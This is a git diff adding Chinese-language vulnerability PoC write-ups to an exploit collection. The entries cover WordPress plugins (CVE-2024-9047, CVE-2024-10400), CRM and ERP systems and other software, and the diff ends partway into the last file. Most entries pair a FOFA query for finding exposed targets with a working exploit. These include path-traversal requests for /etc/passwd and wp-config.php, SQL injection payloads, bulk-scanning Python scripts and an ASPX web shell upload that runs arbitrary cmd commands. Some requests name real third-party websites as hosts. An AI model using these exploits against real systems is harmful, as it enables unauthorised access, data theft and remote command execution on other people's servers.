diff --git a/README.md b/README.md
index 484319a..0865cb1 100644
--- a/README.md
+++ b/README.md
@@ -47,6 +47,28 @@
 </div>
 
 
+## 2024.12.28 新增漏洞
+
+- [CPAS审计管理系统存在任意文件读取漏洞](./北京友数聚科技/CPAS审计管理系统存在任意文件读取漏洞.md)
+- [CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞](./北京友数聚科技/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md)
+- [WordPress插件rtw_pdf_file任意文件读取漏洞](./WordPress/WordPress插件rtw_pdf_file任意文件读取漏洞.md)
+- [WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047)](./WordPress/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md)
+- [WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400)](./WordPress/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md)
+- [灵当CRM系统接口getMyAmbassador存在SQL注入漏洞](./灵当CRM/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md)
+- [灵当CRM系统接口uploadfile文件上传漏洞](./灵当CRM/灵当CRM系统接口uploadfile文件上传漏洞.md)
+- [卓软计量业务管理平台image.ashx任意文件读取漏洞](./华美卓软/卓软计量业务管理平台image.ashx任意文件读取漏洞.md)
+- [博斯外贸管理软件loginednew.jsp存在SQL注入漏洞](./博斯软件/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md)
+- [博斯外贸管理软件logined.jsp存在SQL注入漏洞](./博斯软件/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md)
+- [安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞](./安科瑞/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md)
+- [勤云远程稿件处理系统存在SQL注入漏洞](./北京勤云科技/勤云远程稿件处理系统存在SQL注入漏洞.md)
+- [赛诸葛数字化智能中台系统login存在SQL注入漏洞](./赛诸葛/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md)
+- [网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞](./网神/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md)
+- [朗速ERP系统FileUploadApi.ashx存在文件上传漏洞](./朗速ERP/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md)
+- [月子会所ERP管理云平台GetData.ashx存在SQL注入](./武汉金同方/月子会所ERP管理云平台GetData.ashx存在SQL注入.md)
+- [科汛新职教网校系统CheckOrder存在SQL注入漏洞](./科汛/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md)
+- [虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞](./虹安/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md)
+- [蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞](./蓝凌OA/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md)
+
 ## 2024.12.21 新增漏洞
 
 - [蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞](./蓝凌OA/蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞.md)
diff --git a/WordPress/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md b/WordPress/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md
new file mode 100644
index 0000000..5d6998e
--- /dev/null
+++ b/WordPress/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md
@@ -0,0 +1,116 @@
+# WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047)
+
+WordPress File Upload插件是一款功能强大的WordPress站点文件上传插件，在 <= 4.24.11 版本前的 wfu_file_downloader.php 文件存在前台任意文件读取+任意文件删除漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+```javascript
+"wp-content/plugins/wp-file-upload"
+```
+
+## poc
+```python
+import requests
+import urllib3
+from urllib.parse import urljoin
+import argparse
+import ssl
+import time
+import re
+
+ssl._create_default_https_context = ssl._create_unverified_context
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def read_file(file_path):
+    with open(file_path, 'r') as file:
+        urls = file.read().splitlines()
+    return urls
+
+def extract_version(version_text):
+    match = re.search(r'<strong>Version\s+([0-9]+\.[0-9]+\.[0-9]+)</strong>', version_text)
+    if match:
+        version = match.group(1).strip()  
+        print(f"Found version: {version}")
+        return version
+    return None
+
+def version_to_tuple(version):
+    return tuple(map(int, version.split('.')))
+
+def compare_versions(current_version, target_version='4.24.11'):
+    if current_version:
+        current_tuple = version_to_tuple(current_version)
+        target_tuple = version_to_tuple(target_version)
+        
+        if current_tuple <= target_tuple:
+            print(f"\033[32mVersion {current_version} <= {target_version} - 可能存在漏洞\033[0m")
+            return True
+        else:
+            print(f"Version {current_version} > {target_version} - 无漏洞.")
+            return False
+    return False  
+
+def check(url):
+    protocols = ['http://', 'https://']
+    found_vulnerabilities = False
+
+    for protocol in protocols:
+        target_url = urljoin(protocol + url.lstrip('http://').lstrip('https://'), "/")
+        print(f"Checking {target_url}wp-content")
+        
+        timestamp = str(int(time.time()))
+        
+        target_url = urljoin(target_url, "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file=pQ1DyzbQp5hBxQpW&ticket=Hw8h7dBmxROx27ZZ&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_939a4dc9e3d96a97c2dd1bdcbeab52ce")
+        target_url_version = urljoin(target_url, "/wp-content/plugins/wp-file-upload/release_notes.txt")
+        
+        headers = {
+            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
+            "Cookie": f"wp_wpfileupload_939a4dc9e3d96a97c2dd1bdcbeab52ce=cfyMMnYQqNBbcBNMLTCDnE7ezEAdzLC3; wfu_storage_pQ1DyzbQp5hBxQpW=/../../../../../etc/passwd[[name]]; wfu_download_ticket_Hw8h7dBmxROx27ZZ={timestamp}; wfu_ABSPATH=/;"
+        }
+        headers_version = {
+            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
+        }
+
+        try:
+            response_version = requests.get(target_url_version, verify=False, headers=headers_version, timeout=10)
+
+            if response_version.status_code == 200:
+                version_text = response_version.text
+                version = extract_version(version_text)
+                
+                if compare_versions(version):
+                    response = requests.get(target_url, verify=False, headers=headers, timeout=10)
+                    if response.status_code == 200 and all(key in response.text for key in ('/bin/bash', 'root:x:0:0')):
+                        print(f"\033[31mFind: {url}: WordPress_FileUpload (CVE-2024-9047) - ReadAnyFile!\033[0m")
+                        found_vulnerabilities = True
+                else:
+                    print(f"版本不匹配跳过检查{url}.")
+            else:
+                print(f"找不到版本号 {url}.")
+
+        except Exception as e:
+            print(f"Error while checking {url}: {e}")
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="WordPress 任意文件读取漏洞检测")
+    parser.add_argument("-u", "--url", help="单个url检测")
+    parser.add_argument("-f", "--txt", help="批量检测")
+    args = parser.parse_args()
+    
+    url = args.url
+    txt = args.txt
+    
+    if url:
+        check(url)
+    elif txt:
+        urls = read_file(txt)
+        for url in urls:
+            check(url)
+    else:
+        print("help")
+```
+
+![image-20241227214033657](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272140753.png)
+
+## 漏洞来源
+
+- https://github.com/iSee857/CVE-2024-9047-PoC/blob/main/WordPress_FileUpload(CVE-2024-9047)_ReadAnyFile.py
\ No newline at end of file
diff --git a/WordPress/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md b/WordPress/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md
new file mode 100644
index 0000000..db037ad
--- /dev/null
+++ b/WordPress/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md
@@ -0,0 +1,98 @@
+# WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400)
+
+WordPress 的 Tutor LMS 插件在 2.7.6 及 2.7.6 之前的所有版本中存在通过 “rating_filter ”参数进行 SQL 注入的漏洞，原因是用户提供的参数未进行充分的转义处理，而且现有的 SQL 查询也未进行预编译。这使得未经认证的攻击者有可能在已有的查询中附加额外的 SQL 查询，从而从数据库中提取敏感信息。
+
+## fofa
+```javascript
+body="/wp-content/plugins/tutor/"
+```
+
+## poc
+```javascript
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: academy.keune.ch
+Content-Type: application/x-www-form-urlencoded
+
+action=load_filtered_instructor&_tutor_nonce=56803fc221&rating_filter=1e0+and+1=0+Union+select+1,2,3,4,5,6,7,8,9,concat(0x7e,user(),0x7e),11,12,14--+-
+```
+
+访问网站查看源码，获取_tutor_nonce的参数
+
+![image-20241227220244898](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272202950.png)
+
+![image-20241227220301165](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272203238.png)
+
+## python脚本
+
+```python
+import requests
+import urllib3
+from urllib.parse import urljoin
+import argparse
+import ssl
+import re
+
+ssl._create_default_https_context = ssl._create_unverified_context
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def read_file(file_path):
+    with open(file_path, 'r') as file:
+        return file.read().splitlines()
+        
+def check_sql_injection(url):
+    target_url = url.rstrip("/")
+    target_url_tutor_nonce = urljoin(target_url, "")
+    print(target_url_tutor_nonce)
+    target_endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")
+
+    headers = {
+        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15",  
+        "Content-Type": "application/x-www-form-urlencoded"
+    }
+
+    tutor_nonce = None
+
+    try:
+        response = requests.get(target_url_tutor_nonce, verify=False, headers=headers, timeout=15)
+        
+        match = re.search(r'"_tutor_nonce":"(\w+)"', response.text)
+        if match:
+            tutor_nonce = match.group(1)
+            print(f"\033[32mFound_tutor_nonce: {tutor_nonce}\033[0m")
+            
+        if tutor_nonce:
+            payloads = f"action=load_filtered_instructor&_tutor_nonce={tutor_nonce}&rating_filter=1e0+and+1=0+Union+select+111,2222,3333,4,5,6,7,8,9,concat(md5(123321),version()),11,12,14--+-"
+            
+            
+            response = requests.post(target_endpoint, verify=False, headers=headers, timeout=15, data=payloads)
+            if response.status_code == 200 and all(key in response.text for key in ['c8837b23ff8aaa8a2dde915473ce099110']):
+                print(f"\033[31mFind: {url}: WordPress_CVE-2024-10400_sql_Injection!\033[0m")
+                return True
+
+    except requests.RequestException as e:
+        print(f"Error checking {url}: {e}")
+
+    return False
+
+def main():
+    parser = argparse.ArgumentParser(description="Check for SQL injection vulnerabilities.")
+    group = parser.add_mutually_exclusive_group(required=True)
+    group.add_argument("-u", "--url", help="Target URL")
+    group.add_argument("-f", "--file", help="File containing URLs")
+
+    args = parser.parse_args()
+
+    if args.url:
+        check_sql_injection(args.url)
+    elif args.file:
+        urls = read_file(args.file)
+        for url in urls:
+            check_sql_injection(url)
+
+if __name__ == "__main__":
+    main()
+```
+
+## 漏洞来源
+
+- https://github.com/iSee857/CVE-PoC/blob/d6dc0f2baa9e65ae8d277f9e67086dc2f4bd72ac/WordPress_CVE-2024-10400_sql_Injection.py#L42
\ No newline at end of file
diff --git a/WordPress/WordPress插件rtw_pdf_file任意文件读取漏洞.md b/WordPress/WordPress插件rtw_pdf_file任意文件读取漏洞.md
new file mode 100644
index 0000000..4b03603
--- /dev/null
+++ b/WordPress/WordPress插件rtw_pdf_file任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+# WordPress插件rtw_pdf_file任意文件读取漏洞
+
+WordPress插件rtw_pdf_file任意文件读取漏洞，适用于 WordPress 的 Elementor Page Builder 插件的 PDF 生成器插件在 1.7.5 之前的所有版本中都容易受到路径遍历的攻击，包括 1.7.5 rtw_pgaepb_dwnld_pdf（） 函数。这使得未经身份验证的攻击者能够读取服务器上任意文件的内容，其中可能包含敏感信息。
+
+## fofa
+```javascript
+"wp-content/plugins/pdf-generator-addon-for-elementor-page-builder"
+```
+
+## poc
+```javascript
+GET /?rtw_pdf_file=../../../wp-config.php&rtw_generate_pdf=1 HTTP/1.1
+Host: korurealestate.co.uk
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241227211927240](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272119351.png)
\ No newline at end of file
diff --git a/北京勤云科技/勤云远程稿件处理系统存在SQL注入漏洞.md b/北京勤云科技/勤云远程稿件处理系统存在SQL注入漏洞.md
new file mode 100644
index 0000000..b5bddb4
--- /dev/null
+++ b/北京勤云科技/勤云远程稿件处理系统存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 勤云远程稿件处理系统存在SQL注入漏洞
+
+勤云远程稿件处理系统 存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="北京勤云科技"
+```
+
+## poc
+```javascript
+GET /burpsuite'if%20db_name(1)='master'%20waitfor%20delay%20'0:0:5'--/article/abstract/1 HTTP/1.1
+Host: 
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![image-20241227220754753](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272207815.png)
\ No newline at end of file
diff --git a/北京友数聚科技/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md b/北京友数聚科技/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md
new file mode 100644
index 0000000..de5ea79
--- /dev/null
+++ b/北京友数聚科技/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞
+
+友数聚 CPAS审计管理系统V4 getCurserIfAllowLogin 接口存在SQL注入，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+```javascript
+body="/cpasm4/static/cap/font/iconfont.css"
+```
+
+## poc
+```javascript
+POST /cpasm4/cpasList/getCurserIfAllowLogin HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: text/plain, */*; q=0.01
+
+ygbh=q' AND (SELECT 1635 FROM (SELECT(SLEEP(5)))mlQT) AND 'qoYJ'='qoYJ
+```
+
+![image-20241227215623148](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272156212.png)
\ No newline at end of file
diff --git a/北京友数聚科技/CPAS审计管理系统存在任意文件读取漏洞.md b/北京友数聚科技/CPAS审计管理系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..9ff0dd8
--- /dev/null
+++ b/北京友数聚科技/CPAS审计管理系统存在任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+# CPAS审计管理系统存在任意文件读取漏洞
+
+CPAS审计管理系统存在任意文件读取漏洞
+
+## fofa
+
+```javascript
+icon_hash="-58141038"
+```
+
+## poc
+
+```javascript
+GET /cpasm4/plugInManController/downPlugs?fileId=../../../../etc/passwd&fileName= HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
diff --git a/华美卓软/卓软计量业务管理平台image.ashx任意文件读取漏洞.md b/华美卓软/卓软计量业务管理平台image.ashx任意文件读取漏洞.md
new file mode 100644
index 0000000..95d1107
--- /dev/null
+++ b/华美卓软/卓软计量业务管理平台image.ashx任意文件读取漏洞.md
@@ -0,0 +1,19 @@
+# 卓软计量业务管理平台image.ashx任意文件读取漏洞
+
+卓软计量业务管理平台 image.ashx 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+```javascript
+icon_hash="-334571363"
+```
+
+## poc
+```javascript
+GET /HuameiMeasure/image.ashx?image_path=./../web.config HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![image-20241227214332200](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272143297.png)
\ No newline at end of file
diff --git a/博斯软件/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md b/博斯软件/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md
new file mode 100644
index 0000000..fe28031
--- /dev/null
+++ b/博斯软件/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 博斯外贸管理软件logined.jsp存在SQL注入漏洞
+
+博斯外贸管理软件V6.0 logined.jsp 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+```javascript
+title="欢迎使用 博斯软件"
+```
+
+## poc
+```javascript
+POST /log/logined.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+
+Submit=-1&account=-1&password=1%27+AND+9085+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%289085%3D9085%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29+AND+%27GSSe%27%3D%27GSSe
+```
+
+![image-20241227215420546](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272154610.png)
\ No newline at end of file
diff --git a/博斯软件/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md b/博斯软件/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md
new file mode 100644
index 0000000..c09dc9e
--- /dev/null
+++ b/博斯软件/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 博斯外贸管理软件loginednew.jsp存在SQL注入漏洞
+
+博斯外贸管理软件V6.0 loginednew.jsp 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+```javascript
+title="欢迎使用 博斯软件"
+```
+
+## poc
+```javascript
+GET /loginednew.jsp?welcome=%BB%B6%D3%AD%CA%B9%D3%C3%20%B2%A9%CB%B9%C8%ED%BC%FEV6.0(20110701)&systemname=BS&account=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28117%29%2BCHAR%28115%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28106%29%2BCHAR%2887%29%2BCHAR%28103%29%2BCHAR%2888%29%2BCHAR%28113%29%2BCHAR%2890%29%2BCHAR%28117%29%2BCHAR%2874%29%2BCHAR%28101%29%2BCHAR%28117%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%2879%29%2BCHAR%2883%29%2BCHAR%2886%29%2BCHAR%28104%29%2BCHAR%2868%29%2BCHAR%2889%29%2BCHAR%28107%29%2BCHAR%2874%29%2BCHAR%2887%29%2BCHAR%2871%29%2BCHAR%28115%29%2BCHAR%28121%29%2BCHAR%2873%29%2BCHAR%28114%29%2BCHAR%2882%29%2BCHAR%2866%29%2BCHAR%28115%29%2BCHAR%2882%29%2BCHAR%2872%29%2BCHAR%28117%29%2BCHAR%28106%29%2BCHAR%28121%29%2BCHAR%2880%29%2BCHAR%28117%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28113%29%2CNULL--+EqLf&password=1&val=0000&availHeight=834&Safari=Y&loginurl= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
+![image-20241227215249023](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272152097.png)
\ No newline at end of file
diff --git a/安科瑞/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md b/安科瑞/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md
new file mode 100644
index 0000000..a00acd4
--- /dev/null
+++ b/安科瑞/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞
+
+AcrelCloud-3000环保用电监管云平台依托创新的物联网电力传感技术，实时采集企业总用电、生产设备及环保治理设备用电数据，通过关联分析、超限分析、停电分析、停限产分析，结合及时发现环保治理设备未开启、异常关闭及减速、空转、降频等异常情况，同时通过数据分析还可以实时监控限产和停产整治企业运行状态，用户可以利用PC、手机、平板电脑等多种终端实现对平台的访问。
+
+## fofa
+
+```javascript
+body="myCss/phone.css"
+```
+
+## poc
+
+```javascript
+POST /MainMonitor/GetEnterpriseInfoY HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: text/plain, */*; q=0.01
+
+EnterpriseId=2107265665700008%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cuser%28%29%29%29and%27&Type=4
+```
+
+![image-20241227215812734](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272158792.png)
\ No newline at end of file
diff --git a/朗速ERP/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md b/朗速ERP/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md
new file mode 100644
index 0000000..506d24d
--- /dev/null
+++ b/朗速ERP/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md
@@ -0,0 +1,44 @@
+# 朗速ERP系统FileUploadApi.ashx存在文件上传漏洞
+
+
+
+## fofa
+```javascript
+body="/Resource/Scripts/Yw/Yw_Bootstrap.js"
+```
+
+## poc
+```javascript
+POST /Api/FileUploadApi.ashx?method=DoWebUpload HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
+Accept: */*
+Connection: close
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; name="file"; filename="1.aspx"
+Content-Type: image/jpeg
+
+<%@ Page Language="Jscript" validateRequest="false" %>
+<%
+var c=new System.Diagnostics.ProcessStartInfo("cmd");
+var e=new System.Diagnostics.Process();
+var out:System.IO.StreamReader,EI:System.IO.StreamReader;
+c.UseShellExecute=false;
+c.RedirectStandardOutput=true;
+c.RedirectStandardError=true;
+e.StartInfo=c;
+c.Arguments="/c " + Request.Item["cmd"];
+e.Start();
+out=e.StandardOutput;
+EI=e.StandardError;
+e.Close();
+Response.Write(out.ReadToEnd() + EI.ReadToEnd());
+System.IO.File.Delete(Request.PhysicalPath);
+Response.End();%>
+------WebKitFormBoundaryFfJZ4PlAZBixjELj--
+```
+
+![image-20241227222402497](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272224571.png)
\ No newline at end of file
diff --git a/武汉金同方/月子会所ERP管理云平台GetData.ashx存在SQL注入.md b/武汉金同方/月子会所ERP管理云平台GetData.ashx存在SQL注入.md
new file mode 100644
index 0000000..795f75d
--- /dev/null
+++ b/武汉金同方/月子会所ERP管理云平台GetData.ashx存在SQL注入.md
@@ -0,0 +1,21 @@
+# 月子会所ERP管理云平台GetData.ashx存在SQL注入
+
+月子会所ERP管理云平台 GetData.ashx 接口处存在SQL注入漏洞未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="月子护理ERP管理平台" || body="妈妈宝盒客户端.rar" || body="Page/Login/Login3.aspx"
+```
+
+## poc
+```javascript
+GET /Page/BasicInfo/ashx/GetData.ashx?ChannelId=&ClientName=1&FitemId=null&Phone=1{{urlescape(' AND 4798 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4798=4798) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113)))-- uTFu)}}&RequestMethod=ApplyActivity&SaleId= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+```
+
+![image-20241227222800031](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272228089.png)
\ No newline at end of file
diff --git a/灵当CRM/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md b/灵当CRM/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md
new file mode 100644
index 0000000..29f1ce6
--- /dev/null
+++ b/灵当CRM/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 灵当CRM系统接口getMyAmbassador存在SQL注入漏洞
+
+灵当CRM系统接口getMyAmbassador存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+POST /crm/WeiXinApp/marketing/index.php?module=Ambassador&action=getMyAmbassador HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+logincrm_userid=-1 union select user(),2,3#
+```
+
+![image-20241227212430930](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272124007.png)
\ No newline at end of file
diff --git a/灵当CRM/灵当CRM系统接口uploadfile文件上传漏洞.md b/灵当CRM/灵当CRM系统接口uploadfile文件上传漏洞.md
new file mode 100644
index 0000000..c88ac2a
--- /dev/null
+++ b/灵当CRM/灵当CRM系统接口uploadfile文件上传漏洞.md
@@ -0,0 +1,32 @@
+# 灵当CRM系统接口uploadfile文件上传漏洞
+
